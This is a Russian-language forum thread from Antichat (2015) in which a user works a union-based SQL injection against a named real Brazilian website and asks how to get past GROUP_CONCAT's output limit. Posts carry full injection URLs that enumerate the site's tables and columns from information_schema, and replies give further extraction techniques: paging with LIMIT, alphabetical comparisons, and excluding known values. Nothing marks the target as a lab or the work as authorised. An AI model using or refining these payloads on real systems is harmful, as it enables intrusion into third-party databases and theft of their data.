HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.10.2015, 00:58
AlexG
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344

Репутация: 5
По умолчанию

Сейчас вот такой вывод. Как обойти лимит?

Код:
http://www.fimca.com.br/pagina.asp?id=-11%20union%20select%20all%201,2,3,GROUP_CONCAT%28table_name,0x3a,column_name,0x3c62723e%29,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29%20--+
Встретилось решение через mid(), попробовал, но все равно лимит остался. Пробовал так:

Код:
http://www.fimca.com.br/pagina.asp?id=-11%20union%20select%20all%201,2,3,mid%28GROUP_CONCAT%28table_name,0x3a,column_name,0x3c62723e%29,1024,2048%29,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29%20--+
 
Ответить с цитированием

  #2  
Старый 05.10.2015, 01:05
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197

Репутация: 25


По умолчанию

А зачем вы используете group_concat, которая максимум выведет 1024 символа? не используйте эту функцию и все, все нормально через limit у вас выведется
 
Ответить с цитированием

  #3  
Старый 05.10.2015, 01:26
AlexG
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344

Репутация: 5
По умолчанию

Тупик... Не подскажете какую функцию использовать?
 
Ответить с цитированием

  #4  
Старый 05.10.2015, 01:33
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197

Репутация: 25


По умолчанию

Цитата:
Сообщение от AlexG  

Тупик... Не подскажете какую функцию использовать?
У вас все уже есть.

http://www.fimca.com.br/pagina.asp?...s where table_schema=database()+limit+2,1+--+
 
Ответить с цитированием

  #5  
Старый 05.10.2015, 01:57
AlexG
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344

Репутация: 5
По умолчанию

Я пытался одним запросом вывести все содержимое из базы в виде таблица1:колонка1, таблица1:колонка2, таблица2:колонка1 и т.д., до конца. Это возможно? В вашем варианте лимитом выбираем таблицы, потом по аналогии колонки, потом содержимое - я правильно понимаю?
 
Ответить с цитированием

  #6  
Старый 05.10.2015, 07:53
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197

Репутация: 25


По умолчанию

Цитата:
Сообщение от AlexG  

Я пытался одним запросом вывести все содержимое из базы в виде таблица1:колонка1, таблица1:колонка2, таблица2:колонка1 и т.д., до конца. Это возможно? В вашем варианте лимитом выбираем таблицы, потом по аналогии колонки, потом содержимое - я правильно понимаю?
да, все стандартно
 
Ответить с цитированием

  #7  
Старый 05.10.2015, 09:21
AlexG
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344

Репутация: 5
По умолчанию

Я пытался одним запросом вывести все содержимое из базы в виде таблица1:колонка1, таблица1:колонка2, таблица2:колонка1 и т.д., до конца. - т.е. так не получится? Лимит не обойти?
 
Ответить с цитированием

  #8  
Старый 05.10.2015, 10:05
Strannik1236
Новичок
Регистрация: 06.09.2015
Сообщений: 11
Провел на форуме:
3668

Репутация: 0
По умолчанию

Используйте другую функцию или сокращайте количество символов. А то вы пытаетесь как Алекс одним запросом вывести все содержимое.
 
Ответить с цитированием

  #9  
Старый 05.10.2015, 13:07
AlexG
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344

Репутация: 5
По умолчанию

Цитата:
Сообщение от palec2006  

если лимит не пролазит, то можно так: where column_name>'a', where column_name>'ab',... where column_name>'login', т.е. выборка по алфавиту, или отфильтровывать уже известные данные: where column_name !='login' and...
Спасибо, тема закрыта.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.